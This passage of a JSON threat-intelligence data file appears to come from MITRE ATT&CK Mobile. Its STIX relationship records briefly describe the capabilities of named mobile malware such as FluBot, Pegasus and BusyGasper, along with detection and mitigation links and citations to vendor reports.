Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. 
Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T22:09:02.129Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can add display overlays onto banking apps to capture credit card information.(Citation: proofpoint_flubot_0421)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--592331d2-60a7-4264-b844-fbeb89b6386c", + "created": "2023-03-20T18:58:56.942Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:58:56.942Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--09c55c29-ce4f-4d3e-a940-f3a4b6f07bca", + "created": "2022-04-06T13:22:57.754Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T13:22:57.754Z", + "relationship_type": 
"subtechnique-of", + "source_ref": "attack-pattern--37047267-3e56-453c-833e-d92b68118120", + "target_ref": "attack-pattern--3e091a89-a493-4a6c-8e88-d57be19bb98d", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--af55d12a-5f58-4135-90d0-f465a66f7a3f", + "type": "relationship", + "created": "2020-07-15T20:20:59.305Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." 
+ } + ], + "modified": "2020-07-15T20:20:59.305Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) abuses the accessibility service to prevent removing administrator permissions, accessibility permissions, and to set itself as the default SMS handler.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--554ec347-c8b2-43da-876b-36608dcc543d", + "created": "2017-10-25T14:48:53.746Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "TelephonyManager", + "url": "https://developer.android.com/reference/android/telephony/TelephonyManager.html", + "description": "Android. (n.d.). TelephonyManager. Retrieved December 21, 2016." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 10 introduced changes that prevent normal applications from accessing sensitive device identifiers.(Citation: TelephonyManager) ", + "modified": "2022-03-30T21:04:59.921Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--cd503879-ccb4-4d47-af5a-90fe7e37c438", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "PaloAlto-SpyDealer", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. 
Retrieved September 18, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:53:53.384Z", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) harvests contact lists from victims.(Citation: PaloAlto-SpyDealer)", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4aec0738-2c76-4dc7-af8a-87785e658193", + "created": "2021-10-01T14:42:49.152Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. 
Retrieved October 1, 2021.", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:26:18.801Z", + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can run shell commands.(Citation: SecureList BusyGasper)", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3e2474d3-f36d-4193-92f6-273296befdd3", + "created": "2022-04-05T19:38:18.760Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should protect their account credentials and enable multi-factor authentication options when available. 
", + "modified": "2022-04-05T19:38:18.760Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--9ef05e3d-52db-4c12-be4f-519214bbe91f", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0a737289-c62d-4c0a-a857-6d116f774864", + "type": "relationship", + "created": "2020-06-26T15:12:40.077Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ESET DEFENSOR ID", + "url": "https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/", + "description": "L. Stefanko. (2020, May 22). Insidious Android malware gives up all malicious features but one to gain stealth. Retrieved June 26, 2020." 
+ } + ], + "modified": "2020-06-26T15:12:40.077Z", + "description": "[DEFENSOR ID](https://attack.mitre.org/software/S0479) can abuse the accessibility service to read any text displayed on the screen.(Citation: ESET DEFENSOR ID)", + "relationship_type": "uses", + "source_ref": "malware--5a5dca4c-03c1-4b99-bfcf-c206e20aa663", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1e286a4a-63cd-47df-a034-11a5d92daceb", + "created": "2022-04-06T15:41:03.981Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T15:41:03.981Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--986f80f7-ff0e-4f48-87bd-0394814bbce5", + "target_ref": "attack-pattern--c6a146ae-9c63-4606-97ff-e261e76e8380", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6846dc09-b66a-42d3-aea2-c80b51f22952", + "created": "2023-02-28T21:42:31.008Z", + "revoked": false, + "external_references": [ + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. 
Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-28T21:42:31.008Z", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) can record audio using the device microphone.(Citation: cloudmark_tanglebot_0921)", + "relationship_type": "uses", + "source_ref": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--4b3cfd7c-5e41-4d9e-8879-b126ba66eaf1", + "created": "2021-10-01T14:42:49.176Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can collect every user screen tap and compare the input to a hardcoded list of coordinates to translate the input to a character.(Citation: SecureList BusyGasper)", + "modified": "2022-04-15T17:33:49.565Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2f9b95b2-0ef4-40b8-a230-86f273000dc7", + "created": "2023-03-15T16:26:04.949Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-15T16:26:04.949Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a0464679-71b6-4ab4-a72d-0428e4d75d5e", + "created": "2022-03-30T13:45:39.184Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Device attestation can often detect jailbroken or rooted devices.", + "modified": "2022-03-30T13:45:39.184Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + 
"target_ref": "attack-pattern--29f1f56c-7b7a-4c14-9e39-59577ea2743c", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b3bb33bf-9034-4d5c-8ea0-31d3bbd12b6b", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "PaloAlto-WireLurker", + "description": "Claud Xiao. (2014, November 5). WireLurker: A New Era in OS X and iOS Malware. Retrieved January 24, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2014/11/wirelurker-new-era-os-x-ios-malware/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[WireLurker](https://attack.mitre.org/software/S0312) obfuscates its payload through complex code structure, multiple component versions, file hiding, code obfuscation and customized encryption to thwart anti-reversing.(Citation: PaloAlto-WireLurker)", + "relationship_type": "uses", + "source_ref": "malware--326eaf7b-5784-4f08-8fc2-61fd5d5bc5fb", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f87bb2d2-e7fd-44ce-b537-e7e01086731c", + "type": "relationship", + "created": "2020-12-18T20:14:47.371Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). 
TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." + } + ], + "modified": "2020-12-18T21:00:05.246Z", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) can send SMS messages.(Citation: WhiteOps TERRACOTTA)", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--477edf7d-cc1f-49b7-9d96-f88399808775", + "created": "2022-04-05T20:15:43.660Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T20:15:43.660Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--16d73b64-5681-4ea0-9af4-4ad86f7c96e8", + "target_ref": "attack-pattern--ed2c05a1-4f81-4d97-9e1b-aff01c34ae84", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c14efc74-8a5c-4a2d-b9ba-a231738c90dd", + "created": "2020-12-24T21:41:37.047Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[SilkBean](https://attack.mitre.org/software/S0549) has used HTTPS for C2 communication.(Citation: Lookout Uyghur Campaign)", + "modified": "2022-04-18T16:04:02.127Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--16d73b64-5681-4ea0-9af4-4ad86f7c96e8", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d7aa436a-e66d-4217-be66-4414703dec07", + "type": "relationship", + "created": "2020-11-10T17:08:35.634Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "modified": "2020-11-10T17:08:35.634Z", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) has used incorrect file extensions and encryption to hide most of its assets, including secondary APKs, configuration files, and JAR or DEX files.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3bf5a566-986b-478c-b2da-e57caf261378", + "type": "relationship", + "created": "2019-09-03T19:45:48.515Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019." 
+ } + ], + "modified": "2019-09-11T13:25:19.216Z", + "description": " [Exodus](https://attack.mitre.org/software/S0405) Two attempts to elevate privileges by using a modified version of the DirtyCow exploit.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--450a1b75-efa5-4d7a-bcd5-d3e63723b408", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout-Pegasus", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. Retrieved December 12, 2016." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) monitors the connection state and tracks which types of networks the phone is connected to, potentially to determine the bandwidth and ability to send full data across the network.(Citation: Lookout-Pegasus)", + "modified": "2022-04-15T19:47:48.036Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "target_ref": "attack-pattern--dd818ea5-adf5-41c7-93b5-f3b839a219fb", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--8726b157-3575-450f-bb7f-f17bb18e6aef", + "created": "2022-03-30T20:41:43.314Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "New OS releases frequently contain additional limitations or controls around device location access.", + "modified": "2022-03-30T20:41:43.314Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--e422b6fa-4739-46b9-992e-82f1b350c780", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e03b25b0-0779-48da-b5d7-28f1f6106363", + "type": "relationship", + "created": "2020-12-24T22:04:27.992Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": 
"https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T22:04:27.992Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has taken screenshots.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8e6b9c1e-5e28-4519-95c3-6b4a836661de", + "created": "2023-01-18T19:16:45.773Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. 
Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:07:34.581Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) has used custom encryption to hide strings, potentially to evade antivirus products.(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--63e67cba-4eae-4495-8897-2610103a0c41", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-Pegasus", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. 
Retrieved December 12, 2016.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) exploits iOS vulnerabilities to escalate privileges.(Citation: Lookout-Pegasus)", + "relationship_type": "uses", + "source_ref": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4a4aba6e-2dc4-43a5-bcac-876c89114a57", + "created": "2023-03-20T18:43:49.345Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:43:49.345Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--789ef15a-34d9-4b32-a779-8cbbc9eb32f5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f012feab-5612-429f-81bd-ff75d6ffd04e", + "created": "2022-04-05T17:03:34.941Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T17:03:34.941Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--fa801609-ca8e-415e-815e-65f3826ff4df", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f7039142-dbdc-4ffc-a54f-136ad57a6ac1", + "type": "relationship", + "created": "2020-07-20T13:49:03.693Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020." + } + ], + "modified": "2020-09-24T15:12:24.242Z", + "description": "[XLoader for Android](https://attack.mitre.org/software/S0318) collects the device’s IMSI and ICCID.(Citation: TrendMicro-XLoader-FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4586277d-bebd-4717-87c6-a31a9be741ed", + "type": "relationship", + "created": "2020-12-24T21:45:56.982Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout 